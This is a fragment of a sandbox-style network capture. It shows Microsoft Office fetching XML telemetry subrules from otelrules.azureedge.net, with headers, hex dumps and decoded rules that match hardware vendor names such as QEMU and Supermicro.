                                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120665" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120663" /> <SR T="2" R="([Pp][Ss][Ss][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                95192.168.2.64983213.107.246.45443
                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                2024-10-06 14:42:04 UTC192OUTGET /rules/rule120666v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                2024-10-06 14:42:04 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                Date: Sun, 06 Oct 2024 14:42:04 GMT
                                                                                                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                                                                                                Content-Length: 474
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT
                                                                                                                                                                                                                                                                                ETag: "0x8DC582BB3F48DAE"
                                                                                                                                                                                                                                                                                x-ms-request-id: ef9cab6f-f01e-0099-0d00-179171000000
                                                                                                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                x-azure-ref: 20241006T144204Z-1657d5bbd482lxwq1dp2t1zwkc00000001v000000000dr9k
                                                                                                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                2024-10-06 14:42:04 UTC474INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120666" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120665" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                96192.168.2.64983313.107.246.45443
                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                2024-10-06 14:42:04 UTC192OUTGET /rules/rule120667v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                2024-10-06 14:42:04 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                Date: Sun, 06 Oct 2024 14:42:04 GMT
                                                                                                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                                                                                                Content-Length: 408
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:40 GMT
                                                                                                                                                                                                                                                                                ETag: "0x8DC582BB9B6040B"
                                                                                                                                                                                                                                                                                x-ms-request-id: 2f519f63-901e-0016-75ff-16efe9000000
                                                                                                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                x-azure-ref: 20241006T144204Z-1657d5bbd48sdh4cyzadbb37480000000210000000003vyd
                                                                                                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                2024-10-06 14:42:04 UTC408INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 51 71 5d 5b 45 65 5d 5b 4d 6d 5d 5b 55 75 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20
                                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120667" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120665" /> <SR T="2" R="^([Qq][Ee][Mm][Uu])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                97192.168.2.64983413.107.246.45443
                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                2024-10-06 14:42:04 UTC192OUTGET /rules/rule120668v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                2024-10-06 14:42:05 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                Date: Sun, 06 Oct 2024 14:42:04 GMT
                                                                                                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                                                                                                Content-Length: 469
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT
                                                                                                                                                                                                                                                                                ETag: "0x8DC582BB3CAEBB8"
                                                                                                                                                                                                                                                                                x-ms-request-id: b67c2655-301e-0096-2300-17e71d000000
                                                                                                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                x-azure-ref: 20241006T144204Z-1657d5bbd48brl8we3nu8cxwgn00000002f000000000709m
                                                                                                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                2024-10-06 14:42:05 UTC469INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120668" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120667" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                98192.168.2.64983513.107.246.45443
                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                2024-10-06 14:42:04 UTC192OUTGET /rules/rule120669v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                2024-10-06 14:42:05 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                Date: Sun, 06 Oct 2024 14:42:04 GMT
                                                                                                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                                                                                                Content-Length: 416
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:32 GMT
                                                                                                                                                                                                                                                                                ETag: "0x8DC582BB5284CCE"
                                                                                                                                                                                                                                                                                x-ms-request-id: 821e4157-c01e-0014-3301-17a6a3000000
                                                                                                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                x-azure-ref: 20241006T144204Z-1657d5bbd48brl8we3nu8cxwgn00000002g00000000043k3
                                                                                                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                2024-10-06 14:42:05 UTC416INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 52 72 5d 5b 45 65 5d 5b 44 64 5d 20 5b 48 68 5d 5b 41 61 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72
                                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120669" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120667" /> <SR T="2" R="([Rr][Ee][Dd] [Hh][Aa][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tr


                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                99192.168.2.64984013.107.246.45443
                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                2024-10-06 14:42:05 UTC192OUTGET /rules/rule120674v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                2024-10-06 14:42:05 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                Date: Sun, 06 Oct 2024 14:42:05 GMT
                                                                                                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                                                                                                Content-Length: 474
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT
                                                                                                                                                                                                                                                                                ETag: "0x8DC582BA4037B0D"
                                                                                                                                                                                                                                                                                x-ms-request-id: 3b7b7106-501e-0064-43e7-161f54000000
                                                                                                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                x-azure-ref: 20241006T144205Z-1657d5bbd48vhs7r2p1ky7cs5w00000002h0000000000z0a
                                                                                                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                2024-10-06 14:42:05 UTC474INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120674" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120673" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                100192.168.2.64983613.107.246.45443
                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                2024-10-06 14:42:05 UTC192OUTGET /rules/rule120670v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                2024-10-06 14:42:05 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                Date: Sun, 06 Oct 2024 14:42:05 GMT
                                                                                                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                                                                                                Content-Length: 472
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:25:33 GMT
                                                                                                                                                                                                                                                                                ETag: "0x8DC582B91EAD002"
                                                                                                                                                                                                                                                                                x-ms-request-id: 763e8d43-601e-000d-6912-172618000000
                                                                                                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                x-azure-ref: 20241006T144205Z-1657d5bbd482lxwq1dp2t1zwkc00000001x00000000071d5
                                                                                                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                2024-10-06 14:42:05 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120670" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120669" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                101192.168.2.64983713.107.246.45443
                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                2024-10-06 14:42:05 UTC192OUTGET /rules/rule120671v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                2024-10-06 14:42:05 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                Date: Sun, 06 Oct 2024 14:42:05 GMT
                                                                                                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                                                                                                Content-Length: 432
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:15 GMT
                                                                                                                                                                                                                                                                                ETag: "0x8DC582BAABA2A10"
                                                                                                                                                                                                                                                                                x-ms-request-id: bfab55ab-401e-0015-6202-170e8d000000
                                                                                                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                x-azure-ref: 20241006T144205Z-1657d5bbd48cpbzgkvtewk0wu0000000022g00000000qdym
                                                                                                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                2024-10-06 14:42:05 UTC432INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 53 73 5d 5b 55 75 5d 5b 50 70 5d 5b 45 65 5d 5b 52 72 5d 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54
                                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120671" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120669" /> <SR T="2" R="^([Ss][Uu][Pp][Ee][Rr][Mm][Ii][Cc][Rr][Oo])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T


                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                102192.168.2.64983813.107.246.45443
                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                2024-10-06 14:42:05 UTC192OUTGET /rules/rule120672v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                2024-10-06 14:42:05 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                Date: Sun, 06 Oct 2024 14:42:05 GMT
                                                                                                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                                                                                                Content-Length: 475
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT
                                                                                                                                                                                                                                                                                ETag: "0x8DC582BBA740822"
                                                                                                                                                                                                                                                                                x-ms-request-id: 01bf113a-f01e-003c-3703-178cf0000000
                                                                                                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                x-azure-ref: 20241006T144205Z-1657d5bbd48762wn1qw4s5sd3000000001w000000000nf9d
                                                                                                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                2024-10-06 14:42:05 UTC475INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120672" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120671" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                103192.168.2.64983913.107.246.45443
                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                2024-10-06 14:42:05 UTC192OUTGET /rules/rule120673v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                2024-10-06 14:42:05 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                Date: Sun, 06 Oct 2024 14:42:05 GMT
                                                                                                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                                                                                                Content-Length: 427
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:31 GMT
                                                                                                                                                                                                                                                                                ETag: "0x8DC582BB464F255"
                                                                                                                                                                                                                                                                                x-ms-request-id: 7875ffac-201e-000c-7f02-1779c4000000
                                                                                                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                x-azure-ref: 20241006T144205Z-1657d5bbd487nf59mzf5b3gk8n00000001vg000000000zpp
                                                                                                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                2024-10-06 14:42:05 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 54 74 5d 5b 48 68 5d 5b 49 69 5d 5b 4e 6e 5d 5b 50 70 5d 5b 55 75 5d 5b 54 74 5d 5b 45 65 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120673" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120671" /> <SR T="2" R="([Tt][Hh][Ii][Nn][Pp][Uu][Tt][Ee][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


